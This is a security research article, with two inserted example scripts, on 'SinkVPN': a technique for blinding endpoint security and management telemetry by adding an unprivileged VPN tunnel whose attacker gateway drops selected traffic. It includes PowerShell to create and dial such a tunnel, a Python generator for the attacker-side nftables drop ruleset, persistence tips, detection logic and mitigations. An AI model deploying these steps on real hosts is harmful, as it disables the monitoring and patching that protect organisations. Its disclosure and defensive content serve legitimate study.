SinkVPN: Redirecting endpoint cloud telemetry by abusing usermode VPN tunnels 

Introduction 

Operating systems assume that an interactive user may establish a Virtual Private Network whenever they need one.  

In Windows, this is the user-scope phone-book entry created by Add-VpnConnection; elevation is required only if the optional -AllUserConnection flag is present. [Microsoft]

macOS shows the same behaviour in System Settings ▸ Network ▸ Add VPN Configuration; once the provider's network extension is installed, no administrator password is needed to add a configuration. [Apple]

Linux desktops that run NetworkManager authorise any active console user (or any member of the netdev group) to create and activate a VPN over D-Bus under the default polkit policy; only a stricter polkit rule, or disabling polkit checks altogether with auth-polkit in NetworkManager.conf, changes that. [Ubuntu]

Android, iOS and ChromeOS also expose a VPN feature that forces every packet, including those from system apps, through the selected tunnel and can optionally block any traffic that tries to bypass it. [Google] [Google]

When such a tunnel is configured for full routing (the default unless a split tunnel is explicitly defined), the operating system installs a 0.0.0.0/0 (and ::/0) route via the VPN adapter. A split tunnel is also possible: the server pushes only specific prefixes over the VPN, so that just the traffic of interest is diverted and the rest of the host's traffic never touches the tunnel.

From that moment every process on the host whose destination matches the new route, including security sensors, update clients and compliance beacons, sends its traffic through an attacker-controlled gateway. By dropping the connections that arrive over the malicious tunnel, a threat actor can blind cloud telemetry without touching local firewalls, registry keys, kernel drivers or DNS settings.

We call this post-exploitation technique SinkVPN.

SinkVPN: A minimal proof-of-concept 

Setting up a malicious VPN connection such as SinkVPN takes a single command on most operating systems. On Windows, for example, a few lines of PowerShell are enough to create and dial the connection:

```powershell
# Create a per-user (non-elevated) VPN phone-book entry named "SinkVPN"
Add-VpnConnection -Name "SinkVPN" -ServerAddress "vpn.badguy.tld" -TunnelType IKEv2 -AuthenticationMethod Eap -EncryptionLevel Maximum -Force

# Dial the newly created connection; once it is up the default route moves to the tunnel
rasdial "SinkVPN"
```

Analogous commands exist for `nmcli` on Linux, `scutil --nc` on macOS, `am` intents on Android and the VPN settings pane on iOS.

Once the connection is established, the operating system inserts a default route through the new adapter. On Windows the RasClient provider records the dial-up in the Application log: Event ID 20225 when the connection is established and 20226 when it terminates, as documented by Microsoft.

On the attacker side it is possible to route all traffic or only the prefixes of interest. The VPN server then needs firewall rules (with `nft`, `iptables`, `pf` or a `wg-quick` PostUp hook) that selectively drop what arrives over the tunnel: requests to specific security backends, patch mirrors, licence portals or remote-management services are discarded, while everything else is forwarded so that the host keeps working and the user notices nothing. That is the whole technique; there is no further mystery.
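As an added example that is not part of the original article, the following Python renders such a server-side sink policy as an nftables ruleset and evaluates the same deny-list offline so it can be checked before it is loaded. The prefixes are constructed documentation ranges (RFC 5737 / RFC 3849) standing in for an EDR cloud, a patch mirror and an RMM backend, and the interface names `ipsec0` and `eth0` are assumptions about the gateway.

```python
"""Attacker-side sink policy for a SinkVPN gateway (added example, not the article's code).

verdict() evaluates the deny-list in pure Python; render_nft_ruleset() emits the
equivalent nftables ruleset: traffic entering from the tunnel interface towards a
sink prefix is dropped in the forward path, everything else is forwarded and
masqueraded out of the uplink so the victim stays functional.
"""
import ipaddress

# Constructed sample: documentation ranges standing in for real cloud backends.
SINK_PREFIXES = ["203.0.113.0/24", "198.51.100.10/32", "2001:db8:ed::/48"]
TUNNEL_IF = "ipsec0"   # assumed: interface on which client tunnels terminate
UPLINK_IF = "eth0"     # assumed: the server's internet-facing interface


def verdict(dst, prefixes=SINK_PREFIXES):
    """Return 'drop' if dst lies inside a sink prefix, otherwise 'forward'."""
    addr = ipaddress.ip_address(dst)
    for p in prefixes:
        net = ipaddress.ip_network(p, strict=False)
        if addr.version == net.version and addr in net:
            return "drop"
    return "forward"


def _nft_set(name, addr_type, prefixes):
    """One nft set with interval flag so whole prefixes match; empty set if none."""
    lines = [f"  set {name} {{", f"    type {addr_type}", "    flags interval"]
    if prefixes:
        lines.append("    elements = { %s }" % ", ".join(prefixes))
    lines.append("  }")
    return lines


def render_nft_ruleset(prefixes=SINK_PREFIXES, tun=TUNNEL_IF, uplink=UPLINK_IF):
    """Render the sink policy as an nftables ruleset suitable for `nft -f`."""
    v4 = [p for p in prefixes if ipaddress.ip_network(p, strict=False).version == 4]
    v6 = [p for p in prefixes if ipaddress.ip_network(p, strict=False).version == 6]
    lines = ["table inet sinkvpn {"]
    lines += _nft_set("sink4", "ipv4_addr", v4)
    lines += _nft_set("sink6", "ipv6_addr", v6)
    lines += [
        "  chain forward {",
        "    type filter hook forward priority 0; policy accept;",
        # 'counter' keeps a packet/byte tally per rule, visible in `nft list ruleset`
        f'    iifname "{tun}" ip daddr @sink4 counter drop',
        f'    iifname "{tun}" ip6 daddr @sink6 counter drop',
        "  }",
        "  chain postrouting {",
        "    type nat hook postrouting priority 100; policy accept;",
        f'    oifname "{uplink}" masquerade',
        "  }",
        "}",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for dst in ("203.0.113.7", "198.51.100.11", "2001:db8:ed::1"):
        print(dst, "->", verdict(dst))
    print(render_nft_ruleset())
```

The ruleset only makes sense with IP forwarding enabled on the gateway (`net.ipv4.ip_forward`, `net.ipv6.conf.all.forwarding`); the `counter` keyword is what a defender who later gains access to the server would use to see exactly which backends were being sunk.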

Although the connection is torn down at the end of the session, automatic reconnection is easy to arrange with a logon hook: a Scheduled Task on Windows, a LaunchAgent on macOS or a per-user crontab entry on Linux. On Android a BroadcastReceiver can serve the same purpose.

The whole process requires no administrative privileges, which makes the technique both easy to use and hard to detect.

Proprietary VPN clients magnify the risk 

Defenders sometimes lock the native VPN pane yet overlook the third-party VPN agents already installed on most corporate endpoints. These clients ship a privileged service that dials tunnels on behalf of any user who imports a profile: 

  • FortiClient 7.x: once the FortiClient VPN Scheduler service is set to Automatic, Remote Access ▸ Add Connection in the GUI accepts new entries with no UAC prompt. A community thread confirms that “the client no longer requires admin rights”. [Reddit]
  • Check Point Endpoint VPN: the first launch opens the Site Wizard. Any user can enter a gateway name; the choice is saved to trac.config and the SYSTEM service trac.exe establishes the tunnel. [Check Point]
  • Cisco Secure Client (AnyConnect 5): if the profile flag <UserControllable>true</UserControllable> is left in its default state, users may import an XML profile that sets <AutoConnectOnStart>true</AutoConnectOnStart>. [Cisco]
  • OpenVPN-GUI / WireGuard-UI: dropping a .ovpn or wg.conf file into the user's config directory makes it immediately connectable; the helper services run as NT AUTHORITY\SYSTEM. [OpenVPN]

Because it is the privileged helper service that creates the adapter and installs the routes, a policy that disables the operating-system VPN module does not stop it, and the tunnel's default route, installed with a low metric, takes precedence over every existing adapter.

Impact beyond EDR 

Throughout this article SinkVPN is illustrated primarily as a technique for evading Endpoint Detection and Response software, because that was the purpose for which we used it in our exercises, but any cloud function that expects the endpoint to initiate an outbound connection is affected:

  • Patch and update infrastructure (Windows Update, SUS/CDN, Linux repositories) 
  • Mobile-device-management policies (Intune, Jamf, Workspace ONE) 
  • Data-loss-prevention and CASB telemetry 
  • Remote monitoring and management beacons 
  • Licence and compliance audits 

What changes is not the nature of the traffic but the assumption that it will reach the internet unhindered. 

Detailed comparison with existing telemetry-blocking methods 

SinkVPN is characterized by its lack of elevation, absence of lasting artifacts, and comprehensive protocol coverage across various platforms. 

| Name | Privilege | Artefact | Scope | Cross-OS | Tool |
| --- | --- | --- | --- | --- | --- |
| SinkVPN | User | Transient VPN adapter and route | All protocols (0/0) | Yes | Private |
| WFP call-outs / filters | Admin to add WFP filters; signed driver for kernel call-outs | Registry entries and custom driver | Selected processes / ports | Windows | EDR Silencer [GitHub] |
| Local firewall rules | Admin | Visible rules in wf.msc | Ports / IPs | Windows, Linux | “Firewall EDR Silencer” [Medium] |
| NRPT / hosts hijack | Admin (hosts); user for NRPT via registry | Modified text / registry | DNS only | Windows | EDR Silencer & Beyond [Blu Raven Academy] |
| Static route poisoning | Admin | Extra routes in the table | Selected IP ranges | Windows, Linux | Many scripts |

Detection and monitoring 

Relying on agent self-protection is insufficient. Effective detection combines three angles: 

  1. Network-topology drift: stream route-table changes to the SIEM and alert whenever the default gateway, or the interface behind the 0.0.0.0/0 route, changes. This is a race: the record of the change may itself be routed into the sink, so the forwarder needs a path the tunnel cannot capture (for example an on-link collector) or the alert may never arrive.
  2. VPN connection events: collect Windows RasClient 20225/20226, macOS scncagent, Android VpnManager and third-party client logs (FortiClient, Check Point). The same race applies: the event has to leave the host before the tunnel starts dropping it.
  3. Heartbeat correlation: if a cloud service reports a host as offline shortly after a VPN event, raise an incident. This is probably the most robust angle, because it is evaluated on the server side and does not depend on telemetry the tunnel can drop. A server in particular should never be unreachable for longer than a reboot takes.
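As an added example that is not from the original article, the following Python implements the third angle over a constructed event stream that a SIEM might produce from the first two: RasClient 20225 events and default-route changes are the triggers, and the cloud console's per-host heartbeat is the signal that must survive them. The field names, the five-minute silence window and the host names are assumptions; the log lines are constructed for the example.

```python
"""Heartbeat correlation for SinkVPN detection (added example, not the article's code).

Input: one event per line, "<ISO-8601 time> key=value ...", normalised by the SIEM
from three feeds: Windows RasClient (id=20225 connected, 20226 disconnected), a
route-change feed (event=default_route_changed) and a cloud console heartbeat
(src=heartbeat).  A trigger on a host that was reporting normally just before it
and then stays silent longer than SILENCE raises one alert for that dial-up.
"""
import shlex
from datetime import datetime, timedelta

SILENCE = timedelta(minutes=5)   # assumed: a few normal heartbeat intervals
TRIGGER_IDS = {"20225"}          # RasClient "connection established"


def parse_line(line):
    """Parse '<time> k=v k="quoted v" ...' into a dict with a datetime under 'time'."""
    ts, *kv = shlex.split(line)
    ev = {k: v for k, _, v in (t.partition("=") for t in kv)}
    ev["time"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return ev


def is_trigger(ev):
    """A VPN dial-up or a default-route change is a reason to watch the heartbeat."""
    return (ev.get("src") == "RasClient" and ev.get("id") in TRIGGER_IDS) or \
           (ev.get("src") == "route" and ev.get("event") == "default_route_changed")


def correlate(lines, silence=SILENCE):
    """Return one alert per host whose heartbeat stops within `silence` of a trigger."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e["time"])
    beats = {}
    for ev in events:
        if ev.get("src") == "heartbeat":
            beats.setdefault(ev["host"], []).append(ev["time"])

    alerts, raised_at = [], {}
    for ev in events:
        if not is_trigger(ev):
            continue
        host, t = ev["host"], ev["time"]
        before = [b for b in beats.get(host, []) if b <= t]
        after = [b for b in beats.get(host, []) if b > t]
        # Only hosts that were alive right before the tunnel came up are in scope;
        # a host that was already silent is a different problem.
        if not before or t - before[-1] > silence:
            continue
        if after and after[0] - t <= silence:
            continue   # heartbeat kept flowing: ordinary VPN use
        if host in raised_at and t - raised_at[host] <= silence:
            continue   # RasClient and route events of one dial-up pair up; alert once
        raised_at[host] = t
        alerts.append({
            "host": host,
            "trigger": ev.get("name") or ev.get("if") or ev.get("event"),
            "trigger_time": t,
            "last_heartbeat": before[-1],
            "next_heartbeat": after[0] if after else None,
        })
    return alerts


# Constructed sample: WS-01 dials "SinkVPN" and goes quiet, WS-02 dials a legitimate
# VPN and keeps reporting, WS-03 was already silent before its dial-up.
SAMPLE_LOG = """\
2025-05-17T09:58:00Z host=WS-01 src=heartbeat
2025-05-17T09:59:00Z host=WS-01 src=heartbeat
2025-05-17T10:00:05Z host=WS-01 src=RasClient id=20225 name="SinkVPN"
2025-05-17T10:00:06Z host=WS-01 src=route event=default_route_changed if="SinkVPN"
2025-05-17T10:25:00Z host=WS-01 src=heartbeat
2025-05-17T09:59:00Z host=WS-02 src=heartbeat
2025-05-17T10:00:10Z host=WS-02 src=RasClient id=20225 name="Corp-VPN"
2025-05-17T10:01:00Z host=WS-02 src=heartbeat
2025-05-17T09:30:00Z host=WS-03 src=heartbeat
2025-05-17T10:00:00Z host=WS-03 src=RasClient id=20225 name="Corp-VPN"
""".splitlines()

if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(f"{a['host']}: silent after {a['trigger']} at {a['trigger_time'].isoformat()}")
```

The only real tuning knob is `SILENCE`: it must be longer than the heartbeat interval plus the console's own ingestion lag, or every VPN dial-up becomes an incident; a host whose next heartbeat arrives much later than that, as WS-01 above, is worth a look even if it eventually comes back.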

Mitigation strategies 

The following are some of the mitigation strategies that should be considered: 

  • Restrict who can create VPN profiles: Intune or Group Policy (Prevent addition of new VPN profiles) on Windows, MDM payloads on Apple devices, and on Linux a polkit rule that denies org.freedesktop.NetworkManager.settings.modify.own and org.freedesktop.NetworkManager.network-control to non-administrative users.
  • Filter outbound VPN protocols (IKEv2, L2TP/IPsec, SSTP, WireGuard, OpenVPN) at the perimeter or force them through a proxy that the attacker cannot influence. 
  • Lock third-party VPN GUIs: FortiClient EMS Disable Add/Delete, Check Point :block_sites true, Cisco Secure Client <RestrictPreference>Strict</RestrictPreference>. 

Limitations 

SinkVPN cannot suppress sensors that reach an on-link collector on the corporate LAN, because that traffic matches a more specific route and never enters the tunnel. TLS pinning prevents in-tunnel interception of the content, but outright packet-drop remains effective.

Relevance assessment

A survey of academic databases, security conference proceedings and public code repositories up to 17 May 2025 shows extensive writing on WFP-based blocking (EDRSilencer, EDRPrison) and on DNS or firewall evasion, but no publication describing telemetry suppression achieved solely through unprivileged, user-controlled VPN routing across multiple operating systems.

SinkVPN therefore highlights a gap in current defensive controls. 

Conclusion 

SinkVPN reminds us that the ability for any user to “just add a VPN” is not a harmless convenience.  

On Windows, Linux, macOS, iOS and Android, and inside many proprietary VPN clients, the same feature can be weaponised to divert and selectively drop cloud-bound traffic from security, management and compliance services.

Effective defence is therefore less about locking a single module and more about treating outbound VPN establishment as a privileged operation, continuously monitoring changes in default routing, and correlating those changes with unexpected silence from the endpoint. 

(The information above is provided for defensive research and blue-team readiness. Test only in controlled environments and comply with applicable laws.) 
